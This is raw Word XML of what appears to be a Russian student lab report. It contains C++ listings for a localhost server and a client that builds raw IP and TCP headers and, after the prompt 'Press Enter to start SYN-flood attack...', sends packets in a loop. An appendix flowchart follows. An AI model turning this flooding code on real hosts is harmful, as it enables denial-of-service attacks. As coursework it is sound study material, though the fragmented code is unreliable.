    <w:p w14:paraId="79D0F156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_error_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_desc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"socket(2)");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC75FA9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EADB420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E438BE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uct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_in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sa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661BA73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sa.sin_family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AF_INET;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3A970F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sa.sin_por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ns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8000);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C1E6A6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sa.sin_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r.s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add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et_add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127.0.0.1");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71BA6417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9EB4E1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d(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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_desc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struct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)&amp;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sa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sa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== -1) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="618DCC37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_error_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1, "bind");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E047D4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1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12304E6F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23DB790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B7F4D6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en(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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_desc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ISTEN_BACKLOG) == -1) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5038BAAA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_error_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1, "listen");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B5DEE97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1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D96E0BC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03869E2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42D7EB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_coun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426243E3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D33C7F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add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et_ntoa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sa.sin_add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C4B698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_port_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por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sa.sin_por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D9DB29F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DA4997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Server started." &lt;&lt; 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245F8CE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Host: " &lt;&lt;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add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:" &lt;&lt;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por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std::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166AD3C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10ABB0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true) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4997776C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uct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_in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_sa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2CD4712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2C5967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len_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er_addr_size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uct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_in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6E926B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k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cept(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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_desc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struct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)&amp;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_sa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len_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)&amp;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er_addr_size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F3F015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4E2DF9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_add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et_ntoa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_sa.sin_add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B4662DB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_port_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_por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_sa.sin_por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64B2447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BBA4E3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connected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k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-1) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B18449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_clien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k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D2CCCF8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New client connection: " &lt;&lt;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_add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:" &lt;&lt;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_por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std::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AC02806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CC5787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hread_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read;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6246BEB7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hread_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thread, &amp;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t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receive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4F0F692B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4265AC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_connected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1743432A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Client count: " &lt;&lt; ++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_coun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std::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A746745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AA80B5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flush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out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E1873E6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B2317B8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C51CD87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468C3C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err = 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hread_attr_destroy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t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27EAB9F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8AB3BA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 !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0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041DAC8F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_error_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, "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hread_attr_destroy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01719018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B18749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lose(</w:t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_descr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-1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="419FFFEB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_error_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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</w:t>
      </w:r>
      <w:proofErr w:type="spell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1, "close");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3229BE40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747BF7" w14:textId="77777777" w:rsidR="00A665B7" w:rsidRPr="00A665B7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376536A3" w14:textId="3DC4569F" w:rsidR="009722AB" w:rsidRDefault="00A665B7" w:rsidP="00A665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65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E44C4C" w14:textId="3B6503ED" w:rsidR="00F0157F" w:rsidRPr="00F0157F" w:rsidRDefault="00F0157F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0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0157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0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22AB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>client</w:t>
      </w:r>
      <w:r w:rsidR="0071040C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.cpp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E63354B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arpa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inet.h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F006D97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netinet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in.h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E79108C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netinet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ip.h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57CAAC4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netinet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tcp.h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AB00E38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pthread.h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F1E858F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0F6ABAB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ocket.h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224AE76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unistd.h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445E1ED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7F8FAB9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>#include &lt;atomic&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B73277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0180654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>#include &lt;memory&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B78B2D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062FBD7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>#include "libs/utils.cpp"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40642D50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E2B3778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void* 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receive(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void*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AFBD587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msg[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6A3B7B33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ct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6F24798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7B1538F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while (true) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08DF576A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    int err =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*(int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, msg, 255, 0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B293567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6F29D96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    if (err &gt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5494765B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msg[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255] = '\0';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8D6C6E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&lt;&lt; msg;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72859CF6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ct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0AE383E1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547019D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ct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&gt; 2000)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2015CAB0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7F0D95EE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73DBD0D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68A83A6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    if (err == 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE94EAC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37BEE61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474ED88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4C962A2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    if (err == -1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD9ADBA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handle_error_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-1, "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5EAA059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5163FC3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198F5FB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pthread_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exit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5421655D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03A900E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1B538D0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, char **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051413B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  <w:t xml:space="preserve">char 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datagram[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4096],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ource_ip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[32];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68403AB7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3197DDD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source_ip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, "127.0.0.1");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03FE32AC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memset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datagram, 0, 4096);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49EAAA7B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A9B11C8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  <w:t xml:space="preserve">struct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ockaddr_in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sin;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A05FFCC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in.sin_family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= AF_INET;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1332FC4B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in.sin_port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htons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8000);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26059227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in.sin_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addr.s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_add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inet_add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ource_ip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C4B1E4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AE95BDC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  <w:t xml:space="preserve">auto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iph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fillIPHeade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datagram,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ource_ip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, sin);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0575CD35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  <w:t xml:space="preserve">auto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tcph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fillTCPHeade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datagram);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="134E2C45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tcph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-&gt;ack = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39050784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0FE327D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  <w:t xml:space="preserve">auto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psh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fillFakeHeade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source_ip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, sin);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E3AF98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3D406F3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psh.tcp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tcph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(struct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tcphd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81B82FB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psh.tcpLength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7C948D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05BB5FF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tcph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-&gt;check = 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checksum(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(unsigned short *)&amp;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psh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(struct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FakeHeade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961CA23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79453AA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  <w:t>system("clear");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705A8E60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pthread_attr_t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att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14EF1C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  <w:t xml:space="preserve">int err =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pthread_attr_init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att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25F74B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68C9DDC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err !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= 0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B90E1CD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handle_error_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err, "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pthread_attr_init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033705B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06A28B4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ocket_desc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socket(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AF_INET, SOCK_STREAM, 0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A84C78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A8A7196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ocket_desc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== -1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C3440BD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handle_error_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-1, "socket");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA463CF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</w:p>
    <w:p w14:paraId="0C95CB2D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  <w:t xml:space="preserve">struct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ockaddr_in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erver_sa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A0420E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erver_sa.sin_family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= AF_INET;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44130294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erver_sa.sin_port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htons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8000);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2856CC65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erver_sa.sin_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addr.s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_add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inet_add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ource_ip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4EC165C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0228ED5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&lt;&lt; "Press Enter to start SYN-flood attack..." &lt;&lt; std::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CE38D4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cin.ignore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A66E060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7BAA808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socket_desc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, (struct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ockadd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*)&amp;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erver_sa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erver_sa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)) == -1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ECCF69F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handle_error_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-1, "connect");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="481E290C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81991CB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pthread_t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 thread;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17FAE9D2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  <w:t xml:space="preserve">err =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pthread_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&amp;thread, &amp;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att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, receive, &amp;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ocket_desc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E8E54C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4B15D70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err !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= 0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="535A80CE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handle_error_</w:t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err, "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pthread_create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20C470F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C0EFDB1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62730B7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  <w:t>while (true) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4884A5E9" w14:textId="77777777" w:rsidR="00A665B7" w:rsidRPr="00A665B7" w:rsidRDefault="00A665B7" w:rsidP="00A665B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665B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65B7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>socket_descr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 xml:space="preserve">, datagram, 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A665B7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(datagram), 0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23DDB5C9" w14:textId="77777777" w:rsidR="00A665B7" w:rsidRPr="00056E35" w:rsidRDefault="00A665B7" w:rsidP="00A665B7">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A665B7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00056E35">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B93A734" w14:textId="77777777" w:rsidR="00A665B7" w:rsidRPr="00056E35" w:rsidRDefault="00A665B7" w:rsidP="00A665B7">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A823ECC" w14:textId="77777777" w:rsidR="00A665B7" w:rsidRPr="00056E35" w:rsidRDefault="00A665B7" w:rsidP="00A665B7">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00056E35">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00A665B7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>close</w:t>
      </w:r>
      <w:r w:rsidRPr="00056E35">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00A665B7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>socket</w:t>
      </w:r>
      <w:r w:rsidRPr="00056E35">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A665B7">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>descr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00056E35">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4484572C" w14:textId="399723A3" w:rsidR="005C3FCC" w:rsidRPr="00056E35" w:rsidRDefault="00A665B7" w:rsidP="00A665B7">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00056E35">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="763EFAD4" w14:textId="77777777" w:rsidR="005C3FCC" w:rsidRPr="00056E35" w:rsidRDefault="005C3FCC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00056E35">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="69299651" w14:textId="77777777" w:rsidR="005C3FCC" w:rsidRPr="00056E35" w:rsidRDefault="005C3FCC" w:rsidP="005C3FC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7471312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Е Б</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:br/>
        <w:t>(обязательное)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:br/>
        <w:t>Блок-схема алгоритма</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="6DF998A4" w14:textId="77777777" w:rsidR="005C3FCC" w:rsidRPr="00056E35" w:rsidRDefault="005C3FCC" w:rsidP="005C3FCC"/>
    <w:p w14:paraId="2D29D9D9" w14:textId="7769B828" w:rsidR="00F0157F" w:rsidRPr="009722AB" w:rsidRDefault="005C3FCC" w:rsidP="005C3FCC">
      <w:pPr>
        <w:spacing w:after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13F9364" wp14:editId="5BC8D533">
            <wp:extent cx="5616892" cy="3744595"/>
            <wp:effectExtent l="19050" t="19050" r="22225" b="27305"/>
            <wp:docPr id="6458086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0863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92" cy="3744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0157F" w:rsidRPr="009722AB" w:rsidSect="009A0B1E">
      <w:footerReference w:type="default" r:id="rId13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6BB13" w14:textId="77777777" w:rsidR="009A0B1E" w:rsidRDefault="009A0B1E" w:rsidP="00A42E8A">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="7A4145F8" w14:textId="77777777" w:rsidR="009A0B1E" w:rsidRDefault="009A0B1E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824494" w14:textId="77777777" w:rsidR="00FB3632" w:rsidRPr="00512B31" w:rsidRDefault="00FB363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12B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2B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2B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0C4" w:rsidRPr="00512B3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12B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D981C" w14:textId="77777777" w:rsidR="009A0B1E" w:rsidRDefault="009A0B1E" w:rsidP="00A42E8A">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="1E15AB00" w14:textId="77777777" w:rsidR="009A0B1E" w:rsidRDefault="009A0B1E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5B258D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5EBCC7AA"/>
    <w:lvl w:ilvl="0" w:tplc="CE38CDA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224113">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="627250028">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="236984459">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="2095317950">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="177813963">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1920095948">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1497769180">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1429546441">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="272710428">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="1336299342">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="2041860297">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="1886984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703"/>
    <w:rsid w:val="00010F8A"/>
    <w:rsid w:val="000155B0"/>
    <w:rsid w:val="00022D4E"/>
    <w:rsid w:val="00055294"/>
    <w:rsid w:val="00056E35"/>
    <w:rsid w:val="000577C6"/>
    <w:rsid w:val="00061996"/>
    <w:rsid w:val="00093F72"/>
    <w:rsid w:val="000A147C"/>
    <w:rsid w:val="000B5E22"/>
    <w:rsid w:val="000D1A00"/>
    <w:rsid w:val="000D4CFD"/>
    <w:rsid w:val="000E0037"/>
    <w:rsid w:val="000F46B5"/>
    <w:rsid w:val="000F60C4"/>
    <w:rsid w:val="00102ACB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92C15"/>
    <w:rsid w:val="001946F4"/>
    <w:rsid w:val="001965B7"/>
    <w:rsid w:val="00197C81"/>
    <w:rsid w:val="001B2352"/>
    <w:rsid w:val="001C623F"/>
    <w:rsid w:val="001D6220"/>
    <w:rsid w:val="001F0F61"/>
    <w:rsid w:val="001F4735"/>
    <w:rsid w:val="001F6446"/>
    <w:rsid w:val="002131ED"/>
    <w:rsid w:val="00220E1A"/>
    <w:rsid w:val="00223F34"/>
    <w:rsid w:val="002317CB"/>
    <w:rsid w:val="0023750E"/>
    <w:rsid w:val="00243D05"/>
    <w:rsid w:val="00250F9E"/>
    <w:rsid w:val="00252E8C"/>
    <w:rsid w:val="00260CC5"/>
    <w:rsid w:val="00283C98"/>
    <w:rsid w:val="00284FA2"/>
    <w:rsid w:val="002A2462"/>
    <w:rsid w:val="002A6B10"/>
    <w:rsid w:val="002A7DE4"/>
    <w:rsid w:val="002B12B2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279EA"/>
    <w:rsid w:val="0034393C"/>
    <w:rsid w:val="00351404"/>
    <w:rsid w:val="00355A50"/>
    <w:rsid w:val="003604FB"/>
    <w:rsid w:val="00374791"/>
    <w:rsid w:val="003768F6"/>
    <w:rsid w:val="003858ED"/>
    <w:rsid w:val="003D7FD4"/>
    <w:rsid w:val="003F376D"/>
    <w:rsid w:val="00400E0A"/>
    <w:rsid w:val="00403869"/>
    <w:rsid w:val="00404959"/>
    <w:rsid w:val="00410D21"/>
    <w:rsid w:val="00417577"/>
    <w:rsid w:val="004175AC"/>
    <w:rsid w:val="00417DD9"/>
    <w:rsid w:val="004238E8"/>
    <w:rsid w:val="004332EB"/>
    <w:rsid w:val="00447962"/>
    <w:rsid w:val="00450774"/>
    <w:rsid w:val="00456FD6"/>
    <w:rsid w:val="004679F7"/>
    <w:rsid w:val="004774D4"/>
    <w:rsid w:val="0048168F"/>
    <w:rsid w:val="00490D8C"/>
    <w:rsid w:val="004C3BB8"/>
    <w:rsid w:val="004D6DA2"/>
    <w:rsid w:val="004D6F9B"/>
    <w:rsid w:val="004E2CE7"/>
    <w:rsid w:val="004E3656"/>
    <w:rsid w:val="004E39D6"/>
    <w:rsid w:val="004F1604"/>
    <w:rsid w:val="00507685"/>
    <w:rsid w:val="00512B31"/>
    <w:rsid w:val="005234F2"/>
    <w:rsid w:val="00531A69"/>
    <w:rsid w:val="00536E8A"/>
    <w:rsid w:val="0054036F"/>
    <w:rsid w:val="00541E6D"/>
    <w:rsid w:val="00546365"/>
    <w:rsid w:val="005467C8"/>
    <w:rsid w:val="00564798"/>
    <w:rsid w:val="00565920"/>
    <w:rsid w:val="00566225"/>
    <w:rsid w:val="0059621D"/>
    <w:rsid w:val="005A2233"/>
    <w:rsid w:val="005B0969"/>
    <w:rsid w:val="005B4F46"/>
    <w:rsid w:val="005B7730"/>
    <w:rsid w:val="005C1F43"/>
    <w:rsid w:val="005C2C9C"/>
    <w:rsid w:val="005C3FCC"/>
    <w:rsid w:val="005D02F4"/>
    <w:rsid w:val="005D1B71"/>
    <w:rsid w:val="005D542F"/>
    <w:rsid w:val="005E6462"/>
    <w:rsid w:val="005F10E6"/>
    <w:rsid w:val="005F415E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0C11"/>
    <w:rsid w:val="006F2F87"/>
    <w:rsid w:val="0071040C"/>
    <w:rsid w:val="00711223"/>
    <w:rsid w:val="00726386"/>
    <w:rsid w:val="00726C4E"/>
    <w:rsid w:val="007320FE"/>
    <w:rsid w:val="00737868"/>
    <w:rsid w:val="00745238"/>
    <w:rsid w:val="00747CD9"/>
    <w:rsid w:val="007605C8"/>
    <w:rsid w:val="0076436D"/>
    <w:rsid w:val="007B2335"/>
    <w:rsid w:val="007B7221"/>
    <w:rsid w:val="007D0589"/>
    <w:rsid w:val="007D2D70"/>
    <w:rsid w:val="007E12C3"/>
    <w:rsid w:val="007E2AA3"/>
    <w:rsid w:val="00804595"/>
    <w:rsid w:val="00807EE1"/>
    <w:rsid w:val="00814FE5"/>
    <w:rsid w:val="00842007"/>
    <w:rsid w:val="0085100F"/>
    <w:rsid w:val="00866053"/>
    <w:rsid w:val="00870037"/>
    <w:rsid w:val="008714DE"/>
    <w:rsid w:val="008715C7"/>
    <w:rsid w:val="008771A0"/>
    <w:rsid w:val="00897165"/>
    <w:rsid w:val="008A2C42"/>
    <w:rsid w:val="008B096E"/>
    <w:rsid w:val="008F53B7"/>
    <w:rsid w:val="00906BF7"/>
    <w:rsid w:val="009111D0"/>
    <w:rsid w:val="00915288"/>
    <w:rsid w:val="0091606E"/>
    <w:rsid w:val="00962BFF"/>
    <w:rsid w:val="009722AB"/>
    <w:rsid w:val="009817A2"/>
    <w:rsid w:val="0099290E"/>
    <w:rsid w:val="009A0752"/>
    <w:rsid w:val="009A0B1E"/>
    <w:rsid w:val="009A4278"/>
    <w:rsid w:val="009A71D2"/>
    <w:rsid w:val="009B10F7"/>
    <w:rsid w:val="009B22A2"/>
    <w:rsid w:val="009C5940"/>
    <w:rsid w:val="009D3767"/>
    <w:rsid w:val="009E160A"/>
    <w:rsid w:val="009F0AE7"/>
    <w:rsid w:val="00A01A69"/>
    <w:rsid w:val="00A10C19"/>
    <w:rsid w:val="00A23B77"/>
    <w:rsid w:val="00A32D85"/>
    <w:rsid w:val="00A375B3"/>
    <w:rsid w:val="00A42E8A"/>
    <w:rsid w:val="00A5395D"/>
    <w:rsid w:val="00A548E5"/>
    <w:rsid w:val="00A62BE7"/>
    <w:rsid w:val="00A648BA"/>
    <w:rsid w:val="00A665B7"/>
    <w:rsid w:val="00A66EFF"/>
    <w:rsid w:val="00A74EB1"/>
    <w:rsid w:val="00A75274"/>
    <w:rsid w:val="00A77013"/>
    <w:rsid w:val="00A772FF"/>
    <w:rsid w:val="00AA6276"/>
    <w:rsid w:val="00AB6316"/>
    <w:rsid w:val="00AB793A"/>
    <w:rsid w:val="00AC4AA5"/>
    <w:rsid w:val="00AF725F"/>
    <w:rsid w:val="00AF797D"/>
    <w:rsid w:val="00B00E1E"/>
    <w:rsid w:val="00B072B3"/>
    <w:rsid w:val="00B20351"/>
    <w:rsid w:val="00B34DD1"/>
    <w:rsid w:val="00B442F9"/>
    <w:rsid w:val="00B5099B"/>
    <w:rsid w:val="00B51D55"/>
    <w:rsid w:val="00B6738D"/>
    <w:rsid w:val="00B75FF1"/>
    <w:rsid w:val="00B82D8D"/>
    <w:rsid w:val="00B83906"/>
    <w:rsid w:val="00BA065E"/>
    <w:rsid w:val="00BA7C5F"/>
    <w:rsid w:val="00BB0C3E"/>
    <w:rsid w:val="00BF4B02"/>
    <w:rsid w:val="00C02690"/>
    <w:rsid w:val="00C133C7"/>
    <w:rsid w:val="00C16FCC"/>
    <w:rsid w:val="00C337EC"/>
    <w:rsid w:val="00C4520E"/>
    <w:rsid w:val="00C52324"/>
    <w:rsid w:val="00C52EB6"/>
    <w:rsid w:val="00C53EE3"/>
    <w:rsid w:val="00C64C21"/>
    <w:rsid w:val="00C846A6"/>
    <w:rsid w:val="00C86CBB"/>
    <w:rsid w:val="00C92CAA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27CC"/>
    <w:rsid w:val="00D256AD"/>
    <w:rsid w:val="00D61136"/>
    <w:rsid w:val="00D6584E"/>
    <w:rsid w:val="00D90011"/>
    <w:rsid w:val="00D95FA7"/>
    <w:rsid w:val="00DA03D3"/>
    <w:rsid w:val="00DA2595"/>
    <w:rsid w:val="00DB2656"/>
    <w:rsid w:val="00DB4FC0"/>
    <w:rsid w:val="00DB5A23"/>
    <w:rsid w:val="00DD04CF"/>
    <w:rsid w:val="00DD0FAC"/>
    <w:rsid w:val="00DD1946"/>
    <w:rsid w:val="00E068D3"/>
    <w:rsid w:val="00E23AC6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C5FC3"/>
    <w:rsid w:val="00ED2518"/>
    <w:rsid w:val="00ED5E53"/>
    <w:rsid w:val="00ED6BA8"/>
    <w:rsid w:val="00EE1E69"/>
    <w:rsid w:val="00F0157F"/>
    <w:rsid w:val="00F017B9"/>
    <w:rsid w:val="00F07375"/>
    <w:rsid w:val="00F140CC"/>
    <w:rsid w:val="00F35581"/>
    <w:rsid w:val="00F36C30"/>
    <w:rsid w:val="00F44909"/>
    <w:rsid w:val="00F53E03"/>
    <w:rsid w:val="00F56C45"/>
    <w:rsid w:val="00F57893"/>
    <w:rsid w:val="00F95C88"/>
    <w:rsid w:val="00FB3632"/>
    <w:rsid w:val="00FC174E"/>
    <w:rsid w:val="00FC5190"/>
    <w:rsid w:val="00FC68D3"/>
    <w:rsid w:val="00FD65AD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57F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2317CB"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="right" w:leader="dot" w:pos="9344"/>
      </w:tabs>
      <w:spacing w:after="0" w:line="259" w:lineRule="auto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  <w:style w:type="paragraph" w:customStyle="1" w:styleId="af0">
    <w:name w:val="Рисунок"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="af1"/>
    <w:qFormat/>
    <w:rsid w:val="00A32D85"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:tabs>
        <w:tab w:val="left" w:pos="4536"/>
      </w:tabs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  <w:style w:type="character" w:customStyle="1" w:styleId="af1">
    <w:name w:val="Рисунок Знак"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="af0"/>
    <w:rsid w:val="00A32D85"/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Александр Скворцов</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <cp:lastPrinted>2023-09-14T21:26:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-03-29T10:50:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-03-29T10:50:00Z</dcterms:modified>
</cp:coreProperties>
</file>